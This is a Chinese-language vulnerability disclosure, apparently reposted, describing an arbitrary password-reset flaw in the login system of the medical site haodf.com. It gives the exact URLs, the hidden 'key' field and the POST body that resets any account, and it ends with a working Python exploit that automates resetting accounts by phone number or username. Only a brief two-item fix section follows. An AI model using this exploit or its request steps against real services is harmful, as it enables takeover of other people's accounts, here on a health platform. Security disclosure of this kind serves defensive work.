1、通过手机号重置 http://passport.haodf.com/user/resetpassword
通过此网址,可用邮箱或手机号找回密码 当我们选择手机号找密码时,网页跳转到如下地址,要求输入用户名和手机验证码 http://passport.haodf.com/user/sendpasswordsucc?type=mobile&username=xxxxxxx
可以看出,这时用户名会直接出现在网页地址栏内,且验证码可以绕过 (BTW,手机验证码可以反复使用, 似乎在很长一段时间内都不会过期) 查看网页源代码,找到 < input name="key" type="hidden" id="key" value="DE4rXvQaMCGXBC3UMxQRXXXXXXXXNCEnO8iGq8jhOf0b" / > 这个key就是用来重置密码的key
然后构造一个post请求,地址为 http://passport.haodf.com/user/confirmpassword
数据为 password=123123&confirmPassword=123123&key=XXXXXX
即可重置该用户密码
2、通过用户名重置 网址本身没用提供此功能, 但可以从上面的中间网址进入,即可通过用户名重置 http://passport.haodf.com/user/sendpasswordsucc?type=mobile&username=xxxxxxx
3、通过邮箱重置 类似1中通过手机号重置 附一个python写的简单EXP #encoding=utf8 username = 'init'
class MyHTTPRedirectHandler(urllib2.HTTPRedirectHandler): def http_error_302(self, req, fp, code, msg, httpmsg): for header in httpmsg.headers: if header.count('username=') > 0: global username username = header[header.index('username=')+9: header.index('\r\n')] return urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, httpmsg)
import urllib, urllib2, ConfigParser, time, winsound
def ResetByPhone(phone): resetpwd_url = 'http://passport.haodf.com/user/resetpassword' submit_url = 'http://passport.haodf.com/user/confirmpassword'
req = urllib2.Request(resetpwd_url, 'input=%s' % phone) opener = urllib2.build_opener(MyHTTPRedirectHandler) response = opener.open(req) the_page = response.read() key = the_page[ the_page.index('id="key"')+16 : ] key = key[: key.index('"')]
req = urllib2.Request(submit_url, 'password=%s&confirmPassword=%s&key=%s' % (phone,phone,key)) response = urllib2.urlopen(req) #print response.read()
def ResetByUsername(uname): resetpwd_url = 'http://passport.haodf.com/user/sendpasswordsucc' submit_url = 'http://passport.haodf.com/user/confirmpassword'
req = urllib2.Request(resetpwd_url, 'type=mobile&username=%s' % uname) response = urllib2.urlopen(req) the_page = response.read() key = the_page[ the_page.index('id="key"')+16 : ] key = key[: key.index('"')]
req = urllib2.Request(submit_url, 'password=%s&confirmPassword=%s&key=%s' % (uname,uname,key)) response = urllib2.urlopen(req) #print response.read()
ResetByPhone('13912341234') ResetByUsername('testuser')
修复方案: 把key隐藏 设置验证码失效机制
查看更多关于好大夫重置任意用户 - 网站安全 - 自学php的详细内容...